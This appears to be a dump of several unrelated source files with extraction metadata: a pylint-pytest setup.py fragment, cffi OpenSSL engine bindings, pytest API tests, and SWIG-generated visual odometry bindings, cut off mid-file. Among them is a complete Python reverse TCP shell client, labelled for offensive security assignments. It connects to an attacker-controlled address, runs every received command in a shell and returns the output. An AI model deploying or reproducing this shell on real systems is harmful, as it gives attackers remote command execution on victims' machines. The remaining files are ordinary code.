maintainer_email='[email protected]',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| [((133, 155), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (145, 155), False, 'from os import path\n'), ((167, 195), 'os.path.join', 'path.join', (['here', '"""README.md"""'], {}), "(here, 'README.md')\n", (176, 195), False, 'from os import path\n'), ((696, 739), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['tests', 'sandbox']"}), "(exclude=['tests', 'sandbox'])\n", (709, 739), False, 'from setuptools import setup, find_packages\n')] |
lismore/OffensiveCyberTools | Shells/Python/Client/TCPReverseShell.py | c43fb78f0067498e53cfa5aad9e0fd60ebd6e069 | # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
sock.connect(('192.168.1.95', 5000)) # Replace the IP and listening port to your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
if 'terminate' in sentCommand: # if we get a termiante string from the attack machine then we will close the socket, end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| [((420, 469), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (433, 469), False, 'import socket\n'), ((1233, 1350), 'subprocess.Popen', 'subprocess.Popen', (['sentCommand'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdin': 'subprocess.PIPE'}), '(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=\n subprocess.PIPE, stdin=subprocess.PIPE)\n', (1249, 1350), False, 'import subprocess\n')] |
balabit-deps/balabit-os-6-python-cryptography | src/_cffi_src/openssl/engine.py | c31d184a56a18bad89a6444313367be71b5b0877 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/engine.h>
"""
TYPES = """
static const long Cryptography_HAS_ENGINE_CRYPTODEV;
typedef ... ENGINE;
typedef ... RSA_METHOD;
typedef ... DSA_METHOD;
typedef ... ECDH_METHOD;
typedef ... ECDSA_METHOD;
typedef ... DH_METHOD;
typedef struct {
void (*seed)(const void *, int);
int (*bytes)(unsigned char *, int);
void (*cleanup)();
void (*add)(const void *, int, double);
int (*pseudorand)(unsigned char *, int);
int (*status)();
} RAND_METHOD;
typedef ... STORE_METHOD;
typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
typedef ... *ENGINE_CTRL_FUNC_PTR;
typedef ... *ENGINE_LOAD_KEY_PTR;
typedef ... *ENGINE_CIPHERS_PTR;
typedef ... *ENGINE_DIGESTS_PTR;
typedef ... ENGINE_CMD_DEFN;
typedef ... UI_METHOD;
static const unsigned int ENGINE_METHOD_RSA;
static const unsigned int ENGINE_METHOD_DSA;
static const unsigned int ENGINE_METHOD_RAND;
static const unsigned int ENGINE_METHOD_ECDH;
static const unsigned int ENGINE_METHOD_ECDSA;
static const unsigned int ENGINE_METHOD_CIPHERS;
static const unsigned int ENGINE_METHOD_DIGESTS;
static const unsigned int ENGINE_METHOD_STORE;
static const unsigned int ENGINE_METHOD_ALL;
static const unsigned int ENGINE_METHOD_NONE;
static const int ENGINE_R_CONFLICTING_ENGINE_ID;
"""
FUNCTIONS = """
ENGINE *ENGINE_get_first(void);
ENGINE *ENGINE_get_last(void);
ENGINE *ENGINE_get_next(ENGINE *);
ENGINE *ENGINE_get_prev(ENGINE *);
int ENGINE_add(ENGINE *);
int ENGINE_remove(ENGINE *);
ENGINE *ENGINE_by_id(const char *);
int ENGINE_init(ENGINE *);
int ENGINE_finish(ENGINE *);
void ENGINE_load_openssl(void);
void ENGINE_load_dynamic(void);
void ENGINE_load_builtin_engines(void);
void ENGINE_cleanup(void);
ENGINE *ENGINE_get_default_RSA(void);
ENGINE *ENGINE_get_default_DSA(void);
ENGINE *ENGINE_get_default_ECDH(void);
ENGINE *ENGINE_get_default_ECDSA(void);
ENGINE *ENGINE_get_default_DH(void);
ENGINE *ENGINE_get_default_RAND(void);
ENGINE *ENGINE_get_cipher_engine(int);
ENGINE *ENGINE_get_digest_engine(int);
int ENGINE_set_default_RSA(ENGINE *);
int ENGINE_set_default_DSA(ENGINE *);
int ENGINE_set_default_ECDH(ENGINE *);
int ENGINE_set_default_ECDSA(ENGINE *);
int ENGINE_set_default_DH(ENGINE *);
int ENGINE_set_default_RAND(ENGINE *);
int ENGINE_set_default_ciphers(ENGINE *);
int ENGINE_set_default_digests(ENGINE *);
int ENGINE_set_default_string(ENGINE *, const char *);
int ENGINE_set_default(ENGINE *, unsigned int);
unsigned int ENGINE_get_table_flags(void);
void ENGINE_set_table_flags(unsigned int);
int ENGINE_register_RSA(ENGINE *);
void ENGINE_unregister_RSA(ENGINE *);
void ENGINE_register_all_RSA(void);
int ENGINE_register_DSA(ENGINE *);
void ENGINE_unregister_DSA(ENGINE *);
void ENGINE_register_all_DSA(void);
int ENGINE_register_ECDH(ENGINE *);
void ENGINE_unregister_ECDH(ENGINE *);
void ENGINE_register_all_ECDH(void);
int ENGINE_register_ECDSA(ENGINE *);
void ENGINE_unregister_ECDSA(ENGINE *);
void ENGINE_register_all_ECDSA(void);
int ENGINE_register_DH(ENGINE *);
void ENGINE_unregister_DH(ENGINE *);
void ENGINE_register_all_DH(void);
int ENGINE_register_RAND(ENGINE *);
void ENGINE_unregister_RAND(ENGINE *);
void ENGINE_register_all_RAND(void);
int ENGINE_register_STORE(ENGINE *);
void ENGINE_unregister_STORE(ENGINE *);
void ENGINE_register_all_STORE(void);
int ENGINE_register_ciphers(ENGINE *);
void ENGINE_unregister_ciphers(ENGINE *);
void ENGINE_register_all_ciphers(void);
int ENGINE_register_digests(ENGINE *);
void ENGINE_unregister_digests(ENGINE *);
void ENGINE_register_all_digests(void);
int ENGINE_register_complete(ENGINE *);
int ENGINE_register_all_complete(void);
int ENGINE_ctrl(ENGINE *, int, long, void *, void (*)(void));
int ENGINE_cmd_is_executable(ENGINE *, int);
int ENGINE_ctrl_cmd(ENGINE *, const char *, long, void *, void (*)(void), int);
int ENGINE_ctrl_cmd_string(ENGINE *, const char *, const char *, int);
ENGINE *ENGINE_new(void);
int ENGINE_free(ENGINE *);
int ENGINE_up_ref(ENGINE *);
int ENGINE_set_id(ENGINE *, const char *);
int ENGINE_set_name(ENGINE *, const char *);
int ENGINE_set_RSA(ENGINE *, const RSA_METHOD *);
int ENGINE_set_DSA(ENGINE *, const DSA_METHOD *);
int ENGINE_set_ECDH(ENGINE *, const ECDH_METHOD *);
int ENGINE_set_ECDSA(ENGINE *, const ECDSA_METHOD *);
int ENGINE_set_DH(ENGINE *, const DH_METHOD *);
int ENGINE_set_RAND(ENGINE *, const RAND_METHOD *);
int ENGINE_set_STORE(ENGINE *, const STORE_METHOD *);
int ENGINE_set_destroy_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_init_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_finish_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_ctrl_function(ENGINE *, ENGINE_CTRL_FUNC_PTR);
int ENGINE_set_load_privkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_load_pubkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_ciphers(ENGINE *, ENGINE_CIPHERS_PTR);
int ENGINE_set_digests(ENGINE *, ENGINE_DIGESTS_PTR);
int ENGINE_set_flags(ENGINE *, int);
int ENGINE_set_cmd_defns(ENGINE *, const ENGINE_CMD_DEFN *);
const char *ENGINE_get_id(const ENGINE *);
const char *ENGINE_get_name(const ENGINE *);
const RSA_METHOD *ENGINE_get_RSA(const ENGINE *);
const DSA_METHOD *ENGINE_get_DSA(const ENGINE *);
const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *);
const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *);
const DH_METHOD *ENGINE_get_DH(const ENGINE *);
const RAND_METHOD *ENGINE_get_RAND(const ENGINE *);
const STORE_METHOD *ENGINE_get_STORE(const ENGINE *);
const EVP_CIPHER *ENGINE_get_cipher(ENGINE *, int);
const EVP_MD *ENGINE_get_digest(ENGINE *, int);
int ENGINE_get_flags(const ENGINE *);
const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *);
EVP_PKEY *ENGINE_load_private_key(ENGINE *, const char *, UI_METHOD *, void *);
EVP_PKEY *ENGINE_load_public_key(ENGINE *, const char *, UI_METHOD *, void *);
void ENGINE_add_conf_module(void);
"""
MACROS = """
void ENGINE_load_cryptodev(void);
"""
CUSTOMIZATIONS = """
#if defined(LIBRESSL_VERSION_NUMBER)
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 0;
void (*ENGINE_load_cryptodev)(void) = NULL;
#else
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 1;
#endif
"""
| [] |
AlexandruScrob/fast_api_proj_2 | tests/products/test_products.py | 9aca5d48ab3e42933747b23ff04c6d4f3487d93e | import pytest
from httpx import AsyncClient
from conf_test_db import app
from tests.shared.info import category_info, product_info
@pytest.mark.asyncio
async def test_new_product():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
payload = {
"name": "Quaker Oats",
"quantity": 4,
"description": "Quaker: Good Quality Oats",
"price": 10,
"category_id": category_obj.id,
}
response = await ac.post("/products/", json=payload)
assert response.status_code == 201
json_response = response.json()
assert json_response["name"] == "Quaker Oats"
assert json_response["quantity"] == 4
assert json_response["description"] == "Quaker: Good Quality Oats"
assert json_response["price"] == 10
@pytest.mark.asyncio
async def test_list_products():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
await product_info(category_obj)
response = await ac.get("/products/")
assert response.status_code == 200
assert "name" in response.json()[0]
assert "quantity" in response.json()[0]
assert "description" in response.json()[0]
assert "price" in response.json()[0]
| [((200, 244), 'httpx.AsyncClient', 'AsyncClient', ([], {'app': 'app', 'base_url': '"""http://test"""'}), "(app=app, base_url='http://test')\n", (211, 244), False, 'from httpx import AsyncClient\n'), ((927, 971), 'httpx.AsyncClient', 'AsyncClient', ([], {'app': 'app', 'base_url': '"""http://test"""'}), "(app=app, base_url='http://test')\n", (938, 971), False, 'from httpx import AsyncClient\n'), ((281, 296), 'tests.shared.info.category_info', 'category_info', ([], {}), '()\n', (294, 296), False, 'from tests.shared.info import category_info, product_info\n'), ((1008, 1023), 'tests.shared.info.category_info', 'category_info', ([], {}), '()\n', (1021, 1023), False, 'from tests.shared.info import category_info, product_info\n'), ((1038, 1064), 'tests.shared.info.product_info', 'product_info', (['category_obj'], {}), '(category_obj)\n', (1050, 1064), False, 'from tests.shared.info import category_info, product_info\n')] |
utiasSTARS/matchable-image-transforms | 3rdparty/pyviso2/src/viso2.py | 2c723872ef82e51dfa32abd3bbcec8410cb7dd2d | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_viso2')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_viso2')
_viso2 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_viso2', [dirname(__file__)])
except ImportError:
import _viso2
return _viso2
try:
_mod = imp.load_module('_viso2', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_viso2 = swig_import_helper()
del swig_import_helper
else:
import _viso2
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""value(self) -> PyObject *"""
return _viso2.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(self, n=1) -> SwigPyIterator
incr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(self, n=1) -> SwigPyIterator
decr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_decr(self, n)
def distance(self, x):
"""distance(self, x) -> ptrdiff_t"""
return _viso2.SwigPyIterator_distance(self, x)
def equal(self, x):
"""equal(self, x) -> bool"""
return _viso2.SwigPyIterator_equal(self, x)
def copy(self):
"""copy(self) -> SwigPyIterator"""
return _viso2.SwigPyIterator_copy(self)
def next(self):
"""next(self) -> PyObject *"""
return _viso2.SwigPyIterator_next(self)
def __next__(self):
"""__next__(self) -> PyObject *"""
return _viso2.SwigPyIterator___next__(self)
def previous(self):
"""previous(self) -> PyObject *"""
return _viso2.SwigPyIterator_previous(self)
def advance(self, n):
"""advance(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""__eq__(self, x) -> bool"""
return _viso2.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""__ne__(self, x) -> bool"""
return _viso2.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""__iadd__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""__isub__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""__add__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(self, n) -> SwigPyIterator
__sub__(self, x) -> ptrdiff_t
"""
return _viso2.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _viso2.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class VisualOdometry(_object):
"""Proxy of C++ VisualOdometry class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometry, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometry, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_VisualOdometry
__del__ = lambda self: None
def process(self, p_matched_):
"""process(self, p_matched_) -> bool"""
return _viso2.VisualOdometry_process(self, p_matched_)
def getMotion(self):
"""getMotion(self) -> Matrix"""
return _viso2.VisualOdometry_getMotion(self)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.VisualOdometry_getMatches(self)
def getNumberOfMatches(self):
"""getNumberOfMatches(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfMatches(self)
def getNumberOfInliers(self):
"""getNumberOfInliers(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfInliers(self)
def getInlierIndices(self):
"""getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > >"""
return _viso2.VisualOdometry_getInlierIndices(self)
def getGain(self, inliers_):
"""getGain(self, inliers_) -> float"""
return _viso2.VisualOdometry_getGain(self, inliers_)
VisualOdometry_swigregister = _viso2.VisualOdometry_swigregister
VisualOdometry_swigregister(VisualOdometry)
class calibration(_object):
"""Proxy of C++ VisualOdometry::calibration class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, calibration, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, calibration, name)
__repr__ = _swig_repr
__swig_setmethods__["f"] = _viso2.calibration_f_set
__swig_getmethods__["f"] = _viso2.calibration_f_get
if _newclass:
f = _swig_property(_viso2.calibration_f_get, _viso2.calibration_f_set)
__swig_setmethods__["cu"] = _viso2.calibration_cu_set
__swig_getmethods__["cu"] = _viso2.calibration_cu_get
if _newclass:
cu = _swig_property(_viso2.calibration_cu_get, _viso2.calibration_cu_set)
__swig_setmethods__["cv"] = _viso2.calibration_cv_set
__swig_getmethods__["cv"] = _viso2.calibration_cv_get
if _newclass:
cv = _swig_property(_viso2.calibration_cv_get, _viso2.calibration_cv_set)
def __init__(self):
"""__init__(self) -> calibration"""
this = _viso2.new_calibration()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_calibration
__del__ = lambda self: None
calibration_swigregister = _viso2.calibration_swigregister
calibration_swigregister(calibration)
class bucketing(_object):
"""Proxy of C++ VisualOdometry::bucketing class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, bucketing, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, bucketing, name)
__repr__ = _swig_repr
__swig_setmethods__["max_features"] = _viso2.bucketing_max_features_set
__swig_getmethods__["max_features"] = _viso2.bucketing_max_features_get
if _newclass:
max_features = _swig_property(_viso2.bucketing_max_features_get, _viso2.bucketing_max_features_set)
__swig_setmethods__["bucket_width"] = _viso2.bucketing_bucket_width_set
__swig_getmethods__["bucket_width"] = _viso2.bucketing_bucket_width_get
if _newclass:
bucket_width = _swig_property(_viso2.bucketing_bucket_width_get, _viso2.bucketing_bucket_width_set)
__swig_setmethods__["bucket_height"] = _viso2.bucketing_bucket_height_set
__swig_getmethods__["bucket_height"] = _viso2.bucketing_bucket_height_get
if _newclass:
bucket_height = _swig_property(_viso2.bucketing_bucket_height_get, _viso2.bucketing_bucket_height_set)
def __init__(self):
"""__init__(self) -> bucketing"""
this = _viso2.new_bucketing()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_bucketing
__del__ = lambda self: None
bucketing_swigregister = _viso2.bucketing_swigregister
bucketing_swigregister(bucketing)
class VO_parameters(_object):
"""Proxy of C++ VisualOdometry::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VO_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VO_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["match"] = _viso2.VO_parameters_match_set
__swig_getmethods__["match"] = _viso2.VO_parameters_match_get
if _newclass:
match = _swig_property(_viso2.VO_parameters_match_get, _viso2.VO_parameters_match_set)
__swig_setmethods__["bucket"] = _viso2.VO_parameters_bucket_set
__swig_getmethods__["bucket"] = _viso2.VO_parameters_bucket_get
if _newclass:
bucket = _swig_property(_viso2.VO_parameters_bucket_get, _viso2.VO_parameters_bucket_set)
__swig_setmethods__["calib"] = _viso2.VO_parameters_calib_set
__swig_getmethods__["calib"] = _viso2.VO_parameters_calib_get
if _newclass:
calib = _swig_property(_viso2.VO_parameters_calib_get, _viso2.VO_parameters_calib_set)
def __init__(self):
"""__init__(self) -> VO_parameters"""
this = _viso2.new_VO_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VO_parameters
__del__ = lambda self: None
VO_parameters_swigregister = _viso2.VO_parameters_swigregister
VO_parameters_swigregister(VO_parameters)
class VisualOdometryMono(VisualOdometry):
"""Proxy of C++ VisualOdometryMono class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryMono, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryMono, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryMono"""
this = _viso2.new_VisualOdometryMono(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryMono
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I, dims, replace=False) -> bool
process(self, I, dims) -> bool
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
"""
return _viso2.VisualOdometryMono_process(self, *args)
def getInlierMatches(self):
"""getInlierMatches(self) -> MatchVector"""
return _viso2.VisualOdometryMono_getInlierMatches(self)
def process_frame(self, *args):
"""
process_frame(self, image1, replace=False) -> bool
process_frame(self, image1) -> bool
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryMono_process_frame(self, *args)
VisualOdometryMono_swigregister = _viso2.VisualOdometryMono_swigregister
VisualOdometryMono_swigregister(VisualOdometryMono)
class Mono_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryMono::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Mono_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Mono_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["height"] = _viso2.Mono_parameters_height_set
__swig_getmethods__["height"] = _viso2.Mono_parameters_height_get
if _newclass:
height = _swig_property(_viso2.Mono_parameters_height_get, _viso2.Mono_parameters_height_set)
__swig_setmethods__["pitch"] = _viso2.Mono_parameters_pitch_set
__swig_getmethods__["pitch"] = _viso2.Mono_parameters_pitch_get
if _newclass:
pitch = _swig_property(_viso2.Mono_parameters_pitch_get, _viso2.Mono_parameters_pitch_set)
__swig_setmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Mono_parameters_ransac_iters_get, _viso2.Mono_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Mono_parameters_inlier_threshold_get, _viso2.Mono_parameters_inlier_threshold_set)
__swig_setmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_set
__swig_getmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_get
if _newclass:
motion_threshold = _swig_property(_viso2.Mono_parameters_motion_threshold_get, _viso2.Mono_parameters_motion_threshold_set)
def __init__(self):
"""__init__(self) -> Mono_parameters"""
this = _viso2.new_Mono_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Mono_parameters
__del__ = lambda self: None
Mono_parameters_swigregister = _viso2.Mono_parameters_swigregister
Mono_parameters_swigregister(Mono_parameters)
class VisualOdometryStereo(VisualOdometry):
"""Proxy of C++ VisualOdometryStereo class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryStereo, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryStereo, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryStereo"""
this = _viso2.new_VisualOdometryStereo(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryStereo
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
process(self, p_matched_) -> bool
"""
return _viso2.VisualOdometryStereo_process(self, *args)
def process_frame(self, image1, image2, replace=False):
"""
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryStereo_process_frame(self, image1, image2, replace)
VisualOdometryStereo_swigregister = _viso2.VisualOdometryStereo_swigregister
VisualOdometryStereo_swigregister(VisualOdometryStereo)
class Stereo_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryStereo::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Stereo_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Stereo_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["base"] = _viso2.Stereo_parameters_base_set
__swig_getmethods__["base"] = _viso2.Stereo_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Stereo_parameters_base_get, _viso2.Stereo_parameters_base_set)
__swig_setmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Stereo_parameters_ransac_iters_get, _viso2.Stereo_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Stereo_parameters_inlier_threshold_get, _viso2.Stereo_parameters_inlier_threshold_set)
__swig_setmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_set
__swig_getmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_get
if _newclass:
reweighting = _swig_property(_viso2.Stereo_parameters_reweighting_get, _viso2.Stereo_parameters_reweighting_set)
def __init__(self):
"""__init__(self) -> Stereo_parameters"""
this = _viso2.new_Stereo_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Stereo_parameters
__del__ = lambda self: None
Stereo_parameters_swigregister = _viso2.Stereo_parameters_swigregister
Stereo_parameters_swigregister(Stereo_parameters)
class Matrix(_object):
"""Proxy of C++ Matrix class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matrix, name)
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Matrix
__init__(self, m, n) -> Matrix
__init__(self, m, n, val_) -> Matrix
__init__(self, M) -> Matrix
"""
this = _viso2.new_Matrix(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matrix
__del__ = lambda self: None
def assign(self, M):
"""assign(self, M) -> Matrix"""
return _viso2.Matrix_assign(self, M)
def getData(self, val_, i1=0, j1=0, i2=-1, j2=-1):
"""
getData(self, val_, i1=0, j1=0, i2=-1, j2=-1)
getData(self, val_, i1=0, j1=0, i2=-1)
getData(self, val_, i1=0, j1=0)
getData(self, val_, i1=0)
getData(self, val_)
"""
return _viso2.Matrix_getData(self, val_, i1, j1, i2, j2)
